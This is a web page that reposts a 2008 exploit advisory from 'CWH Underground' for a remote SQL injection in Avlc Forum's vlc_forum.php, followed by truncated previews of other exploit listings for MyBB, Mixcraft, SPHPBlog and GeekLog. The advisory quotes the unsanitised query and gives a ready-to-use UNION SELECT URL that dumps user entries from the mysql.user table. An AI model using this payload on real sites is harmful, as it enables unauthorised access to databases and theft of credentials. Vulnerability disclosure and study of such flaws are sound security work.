Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
所属分类:
网络安全 / Exploit
阅读数:
94
收藏 0赞 0分享
====================================================================
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
` ---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 12 July 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : Avlc Forum
VERSION : N/A
VENDOR : N/A
DOWNLOAD : http://www.easy-script.com/compt.php?id=2147
#####################################################
-- Remote SQL Injection ---
---------------------------------
Vulnerable File [vlc_forum.php]
---------------------------------
@Line
141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());
-------------
POC Exploit
-------------
[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--
#####################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
MyBulletinBoard (MyBB)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0赞 0分享
Acoustica Mixcraft
#!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
收藏 0赞 0分享
Simple PHP Blog (SPHPBlog)
<?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
收藏 0赞 0分享
GeekLog
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
收藏 0赞 0分享
NoName Script
################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0赞 0分享
查看更多